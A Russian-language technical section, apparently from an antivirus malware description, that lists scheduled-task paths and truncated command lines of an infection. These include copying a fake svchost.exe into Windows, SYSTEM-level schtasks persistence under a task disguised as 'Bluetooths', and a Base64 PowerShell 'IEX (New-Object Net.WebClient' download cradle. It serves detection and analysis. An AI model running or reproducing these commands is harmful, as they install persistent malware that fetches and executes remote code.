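Техническая информация
Ниже перечислены пути к файлам заданий планировщика в <SYSTEM32>\tasks и командные строки запущенных процессов; имена заданий совпадают (без учёта регистра) со значениями параметра /tn в командах schtasks. Длинные командные строки обрезаны («...»). Все три задания создаются с параметром /ru system, то есть выполняются от имени SYSTEM; видимое начало аргумента -e у powershell после декодирования Base64 (UTF-16LE) даёт строку «IEX (New-Object Net.WebClient».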
- <SYSTEM32>\tasks\microsoft\windows\bluetooths
- <SYSTEM32>\tasks\slsd
- <SYSTEM32>\tasks\pyedvoo
- '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\temp\svchost.exe %WINDIR%\slSd.exe&move /y %WINDIR%\temp\dig.exe %WINDIR%\HdVWa.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\temp\svchost.exe %WINDIR%\slSd.exe&move /y %WINDIR%\temp\dig.exe %WINDIR%\HdVWa.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /...
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0A...
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn slSd /tr "%WINDIR%\slSd.exe" /F
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\pyedVOo" /tr "%WINDIR%\HdVWa.exe" /F